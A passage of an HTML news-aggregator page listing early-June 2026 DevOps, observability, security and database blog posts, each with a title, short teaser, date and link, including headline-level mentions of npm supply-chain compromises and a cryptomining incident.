          🔄 CI/CD
        </a>
        </h2><h3 id="h3-shai-hulud-miasma-inside-the-compromise-of-red-hat-packages" class="group relative scroll-mt-24">
        <a href="#h3-shai-hulud-miasma-inside-the-compromise-of-red-hat-packages" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Shai-Hulud Miasma: Inside the Compromise of Red Hat Packages
        </a>
        </h3><p>An in-depth look at the Miasma supply chain attack that compromised Red Hat npm packages. Learn how the malware spread, stole credentials, abused trusted publishing, and the steps teams can take to mi</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/shai-hulud-miasma-inside-the-compromise-of-red-hats-packages"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-universe-is-back-all-together-now-in-the-agentic-era" class="group relative scroll-mt-24">
        <a href="#h3-github-universe-is-back-all-together-now-in-the-agentic-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Universe is back: All together now, in the agentic era
        </a>
        </h3><p>GitHub Universe is back: returning to the historic Fort Mason Center in San Francisco on October 28–29, 2026. The post GitHub Universe is back: All together now, in the agentic era appeared first on T</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-universe-is-back-all-together-now-in-the-agentic-era/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-controlling-who-runs-what" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-controlling-who-runs-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project: Controlling who runs what
        </a>
        </h3><p>Part one The last twelve months have been rough on the open source supply chain. Axios was compromised on npm and shipped a remote access trojan inside otherwise normal-looking releases. LiteLLM’s PyP</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/04/securing-ci-cd-for-an-open-source-project-controlling-who-runs-what/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-copilot-app-the-agent-native-desktop-experience" class="group relative scroll-mt-24">
        <a href="#h3-github-copilot-app-the-agent-native-desktop-experience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Copilot app: The agent-native desktop experience
        </a>
        </h3><p>At Microsoft Build 2026, GitHub introduced new tools, updates, and surfaces so agents can work the way you already work. The post GitHub Copilot app: The agent-native desktop experience appeared first</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/product-news/github-copilot-app-the-agent-native-desktop-experience/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-amazon-bedrock-agentcore-runtime-introduces-interactive-shells-for-terminal-access-into-agent-sessions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-bedrock-agentcore-runtime-introduces-interactive-shells-for-terminal-access-into-agent-sessions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Bedrock AgentCore Runtime introduces interactive shells for terminal access into agent sessions
        </a>
        </h3><p>Amazon Bedrock AgentCore Runtime now supports interactive shells through a new InvokeAgentRuntimeCommandShell API, opening a persistent, PTY-backed terminal directly into a running agent session over </p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-bedrock-agentcore-runtime/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-trigger-deployments-on-git-tags" class="group relative scroll-mt-24">
        <a href="#h3-trigger-deployments-on-git-tags" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Trigger Deployments on Git Tags
        </a>
        </h3><p>A git tag is how many teams mark a release as ready. Pulumi Deployments can now act on that signal directly: configure a tag-based trigger, push a version tag like v1.2.0, and Pulumi automatically run</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/trigger-deployments-on-git-tags/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-use-your-mac-for-ai-agents-self-host-gemma-4-12-b-with-pulumi-and-tailscale" class="group relative scroll-mt-24">
        <a href="#h3-use-your-mac-for-ai-agents-self-host-gemma-4-12-b-with-pulumi-and-tailscale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Use Your Mac for AI Agents: Self-Host Gemma 4 12 B with Pulumi and Tailscale
        </a>
        </h3><p>If you run AI tools and agents, you’ve probably accepted three tradeoffs: your data leaves your network, you can’t work offline, and your bill scales with usage. Open-weight models now run well on con</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/self-host-gemma4-llama-cpp-k8s-tailscale-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-choose-pulumi-over-terraform" class="group relative scroll-mt-24">
        <a href="#h3-why-choose-pulumi-over-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Choose Pulumi Over Terraform?
        </a>
        </h3><p>Terraform is a proven infrastructure as code tool with a large provider and module ecosystem. Many teams choose Pulumi when they want to keep that infrastructure as code model, but write and maintain </p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/why-choose-pulumi-over-terraform/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-from-cool-demo-to-production-ready-how-we-made-an-ai-travel-agent-trustworthy-with-new-relic" class="group relative scroll-mt-24">
        <a href="#h3-from-cool-demo-to-production-ready-how-we-made-an-ai-travel-agent-trustworthy-with-new-relic" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Cool Demo to Production-Ready: How We Made an AI Travel Agent Trustworthy with New Relic
        </a>
        </h3><p>A walkthrough of taking an AI Travel Agent (WanderAI) from a demo to production, covering OpenTelemetry tracing, AI monitoring, SLOs, and prompt injection defense.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/ai-travel-agent-production-ready-new-relic"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-the-future-of-telemetry-in-the-open" class="group relative scroll-mt-24">
        <a href="#h3-building-the-future-of-telemetry-in-the-open" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building the Future of Telemetry in the Open
        </a>
        </h3><p>New Relic Experimental is our open-source incubator designed to bridge the gap between emerging tech and enterprise observability.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/building-the-future-of-telemetry-in-the-open"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-errors-traces-logs-metrics-when-to-reach-for-what" class="group relative scroll-mt-24">
        <a href="#h3-errors-traces-logs-metrics-when-to-reach-for-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Errors, traces, logs, metrics: when to reach for what
        </a>
        </h3><p>Errors, traces, logs, and metrics overlap enough that it&#39;s hard to know which to use. Here&#39;s when to reach for each signal, with a real debugging walkthrough.</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/errors-traces-logs-metrics-when-to-reach-for-what/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise" class="group relative scroll-mt-24">
        <a href="#h3-supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Supercharge SAP on AWS: Intelligent Observability for the hybrid enterprise
        </a>
        </h3><p>Supercharge SAP on AWS transformation with New Relic&#39;s intelligent observability. Get full-stack visibility across hybrid and RISE with SAP environments.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-relic-and-microsoft-intelligent-observability-for-the-agentic-era" class="group relative scroll-mt-24">
        <a href="#h3-new-relic-and-microsoft-intelligent-observability-for-the-agentic-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Relic and Microsoft: Intelligent Observability for the Agentic Era
        </a>
        </h3><p>See how New Relic and Microsoft are embedding Intelligent Observability into Azure workflows and what we’ve built for teams deploying AI in production.</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/microsoft-build-2026"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-ai-governance-frameworks-principles-and-best-practices" class="group relative scroll-mt-24">
        <a href="#h3-what-is-ai-governance-frameworks-principles-and-best-practices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is AI Governance? Frameworks, Principles, and Best Practices
        </a>
        </h3><p>AI agents are moving fast. According to our State of Agentic AI report, 60% of organizations already have AI agents in production, yet 40% cite security and compliance as the number-one barrier to sca</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-ai-governance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-secure-code-warrior-leverages-ai-to-extend-devsecops-training-reach" class="group relative scroll-mt-24">
        <a href="#h3-secure-code-warrior-leverages-ai-to-extend-devsecops-training-reach" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Secure Code Warrior Leverages AI to Extend DevSecOps Training Reach
        </a>
        </h3><p>Secure Code Warrior this week extended the capability of its artificial intelligence (AI) agent to make it possible to surface relevant training insights in real time as application developers are wri</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/secure-code-warrior-leverages-ai-extend-devsecops-training-reach/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-security-into-itops-from-the-start-with-automation" class="group relative scroll-mt-24">
        <a href="#h3-build-security-into-itops-from-the-start-with-automation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build security into ITOps from the start with automation
        </a>
        </h3><p>It&#39;s no secret that IT operations is a complex area. Teams face demanding workloads, where many tasks have to be completed quickly. Objectives typically focus on smooth and resilient operations, and e</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/build-security-itops-start-automation"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-planning-your-path-forward-from-amazon-linux-2-why-consistency-is-the-ultimate-upgrade" class="group relative scroll-mt-24">
        <a href="#h3-planning-your-path-forward-from-amazon-linux-2-why-consistency-is-the-ultimate-upgrade" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Planning your path forward from Amazon Linux 2: Why consistency is the ultimate upgrade
        </a>
        </h3><p>Amazon Linux 2 reaches end of life (EOL) on June 30, 2026. If your migration isn&#39;t already underway, the window to move deliberately rather than reactively is narrowing. Migrating business-critical wo</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/planning-your-path-forward-amazon-linux-2-why-consistency-ultimate-upgrade"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-5-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-5-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 5, 2026
        </a>
        </h3><p>InfoWorld - IBM and Red Hat want to become the ‘security clearinghouse’ for open source applications in the enterprise. InfoWorld looks at IBM and Red Hat&#39;s Project Lightwell, a $5 billion initiative ba</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-5-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-so-you-have-an-ai-security-budget-now-what" class="group relative scroll-mt-24">
        <a href="#h3-so-you-have-an-ai-security-budget-now-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 So You Have an AI Security Budget. Now what?
        </a>
        </h3><p>An AI security budget should fund more than visibility. The real priority is unified governance and enforcement across agentic development and production apps.</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/ai-security-budget/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-node-gyp-supply-chain-compromise-a-self-propagating-npm-worm-that-hides-in-bindinggyp" class="group relative scroll-mt-24">
        <a href="#h3-node-gyp-supply-chain-compromise-a-self-propagating-npm-worm-that-hides-in-bindinggyp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Node-gyp Supply Chain Compromise: A Self-Propagating npm Worm That Hides in binding.gyp
        </a>
        </h3><p>A new npm worm is abusing binding.gyp to trigger node-gyp during install, letting malicious packages run code without lifecycle scripts. It steals credentials, persists in GitHub, and self-propagates </p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/node-gyp-supply-chain-compromise-self-propagating-npm-worm-binding-gyp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-type-level-security-the-future-of-secure-ai-code-generation" class="group relative scroll-mt-24">
        <a href="#h3-type-level-security-the-future-of-secure-ai-code-generation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Type Level Security: The future of secure AI code generation?
        </a>
        </h3><p>Secure-by-design types can turn common bugs into compile-time errors. This post explores how type-level security could help prevent entire classes of AI-generated vulnerabilities.</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/type-level-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-software-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-what-is-software-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is Software Supply Chain Security?
        </a>
        </h3><p>Software supply chain attacks have accelerated faster than most security teams anticipated. Sonatype&#39;s 2026 State of the Software Supply Chain report identified more than 454,000 new malicious package</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-software-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-may-2026-product-updates-60-new-features" class="group relative scroll-mt-24">
        <a href="#h3-harness-may-2026-product-updates-60-new-features" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness May 2026 Product Updates: 60+ New Features
        </a>
        </h3><p>See 60+ Harness updates from May 2026 across AI-native development, software delivery, security, artifact management, cost visibility, and engineering insights.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/shipped-in-may-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-security-risks-of-the-agentic-development-lifecycle" class="group relative scroll-mt-24">
        <a href="#h3-the-new-security-risks-of-the-agentic-development-lifecycle" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New Security Risks of the Agentic Development Lifecycle
        </a>
        </h3><p>AI agents are changing how software gets built, and with it, where security risk begins. Learn why securing the process matters as much as securing the code.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/agentic-development-lifecycle/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-the-laptop-return-that-broke-a-rag-pipeline" class="group relative scroll-mt-24">
        <a href="#h3-the-laptop-return-that-broke-a-rag-pipeline" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Laptop Return that Broke a RAG Pipeline
        </a>
        </h3><p>Editor’s note: This post originally appeared on The New Stack and is republished with permission. The original version is available here. A few months ago, one of our users filed a bug report that stu</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/hybrid-search-rag-retrieval-accuracy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-data-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-data-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Data Cloud
        </a>
        </h3><p>June 1 - June 5 Beyond the Query: Powering AI Agents with Bigtable, Firestore &amp; Memorystore Discover the latest advancements in Google Cloud&#39;s NoSQL Database portfolio, including Bigtable, Firestore, </p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-get-started-with-meko-agent-memory-with-built-in-discernment" class="group relative scroll-mt-24">
        <a href="#h3-get-started-with-meko-agent-memory-with-built-in-discernment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Get Started with Meko: Agent Memory with Built-in Discernment
        </a>
        </h3><p>With Meko, your project context lives in a datapack any MCP-connected client can read. This allows you to switch tools without losing context, share useful information with your team while keeping sel</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/meko-agent-memory-with-built-in-discernment/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-19-beta-1-released" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-19-beta-1-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL 19 Beta 1 Released!
        </a>
        </h3><p>The PostgreSQL Global Development Group announces that the first beta release of PostgreSQL 19 is now available for download. This release contains PostgreSQL 19 feature previews ahead of general avai</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-19-beta-1-released-3313/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agentic-supplier-management-with-mongodb-atlas-voyage-ai-and-multi-modal-search" class="group relative scroll-mt-24">
        <a href="#h3-agentic-supplier-management-with-mongodb-atlas-voyage-ai-and-multi-modal-search" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agentic Supplier Management with MongoDB Atlas, Voyage AI, and Multi-Modal Search
        </a>
        </h3><p>Retail supply chains are not a back-office logistics function; they are a high-stakes, board-level concern. Imagine learning suddenly that shipment rerouting surcharges have doubled due to new regiona</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/agentic-supplier-management-with-atlas-voyage-ai-multi-modal-search"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-powering-the-inference-era-inside-the-digitalocean-data-learning-layer" class="group relative scroll-mt-24">
        <a href="#h3-powering-the-inference-era-inside-the-digitalocean-data-learning-layer" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Powering the Inference Era: Inside the DigitalOcean Data & Learning Layer
        </a>
        </h3><p>Building an AI-native application requires a data layer that can do two things at once: handle the structured, transactional queries your application runs on, and understand meaning well enough to pow</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/dataandlearning"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-reasoning-explained-smarter-models-still-need-context" class="group relative scroll-mt-24">
        <a href="#h3-ai-reasoning-explained-smarter-models-still-need-context" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI reasoning explained: smarter models still need context
        </a>
        </h3><p>Every few months, a new AI model drops with higher benchmark scores, and the reaction is predictable: &quot;This one finally reasons.&quot; The leaderboard shuffles. And teams building production AI systems sti</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-reasoning-explained-context-matters/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-semantic-layer-vs-context-layer-where-bi-modeling-ends-ai-grounding-begins" class="group relative scroll-mt-24">
        <a href="#h3-semantic-layer-vs-context-layer-where-bi-modeling-ends-ai-grounding-begins" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Semantic layer vs context layer: where BI modeling ends & AI grounding begins
        </a>
        </h3><p>Your BI semantic layer solved a hard problem: getting every team, dashboard, and report to agree on what shared metrics like &quot;revenue,&quot; &quot;active customer,&quot; or &quot;customer acquisition cost&quot; actually mean.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/semantic-layer-vs-context-layer/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dear-cqlsh-your-dependencies-were-killing-us-ps-we-rewrote-you-in-rust" class="group relative scroll-mt-24">
        <a href="#h3-dear-cqlsh-your-dependencies-were-killing-us-ps-we-rewrote-you-in-rust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dear cqlsh: Your dependencies were killing us (P.S. We rewrote you in Rust)
        </a>
        </h3><p>A story of rewriting cqlsh in Rust…with Claude Code and a lot of planning Dear cqlsh, I vouched for you. I told the team you were fine. I forked you, catered to you, vendored your dependencies and you</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/02/rewrote-cqlsh-in-rust/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-beautiful-game-winning-at-scale-with-a-multi-agent-strategy" class="group relative scroll-mt-24">
        <a href="#h3-the-beautiful-game-winning-at-scale-with-a-multi-agent-strategy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Beautiful Game: Winning at Scale with a Multi-Agent Strategy
        </a>
        </h3><p>During major live sporting events, peak traffic reaches unprecedented levels, and customers expect a flawless in-the-moment experience. The right data infrastructure separates the platforms that win f</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/winning-at-scale-with-a-multi-agent-strategy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-your-ai-doesnt-understand-your-business-how-teams-fix-it" class="group relative scroll-mt-24">
        <a href="#h3-why-your-ai-doesnt-understand-your-business-how-teams-fix-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why your AI doesn't understand your business (& how teams fix it)
        </a>
        </h3><p>Your AI can summarize documents and answer questions about almost anything on the internet. But ask it about your business, and things fall apart. It pulls stale pricing, ignores internal policies, or</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/why-ai-misses-business-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-diving-deep-into-rediss-new-array-data-type" class="group relative scroll-mt-24">
        <a href="#h3-diving-deep-into-rediss-new-array-data-type" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Diving deep into Redis’s new array data type
        </a>
        </h3><p>The most popular data types in Redis are strings, lists, hashes, sets, and sorted sets. Each is purpose-built around a specific way of organizing data, enabling developers to solve a wide range of tec</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/diving-deep-into-rediss-new-array-data-type/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplified-permissions-for-amazon-s3-tables-and-iceberg-materialized-views-are-now-available-in-aws-govcloud-us-regions" class="group relative scroll-mt-24">
        <a href="#h3-simplified-permissions-for-amazon-s3-tables-and-iceberg-materialized-views-are-now-available-in-aws-govcloud-us-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplified permissions for Amazon S3 Tables and Iceberg materialized views are now available in AWS GovCloud (US) Regions
        </a>
        </h3><p>AWS Glue Data Catalog now supports AWS IAM-based authorization for Amazon S3 Tables and Apache Iceberg materialized views. With IAM-based authorization, you can define all necessary permissions across</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/gdc-s3tables-simplified-permissions-in-aws-govcloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-opensearch-ui-is-now-available-in-govcloud-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-opensearch-ui-is-now-available-in-govcloud-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
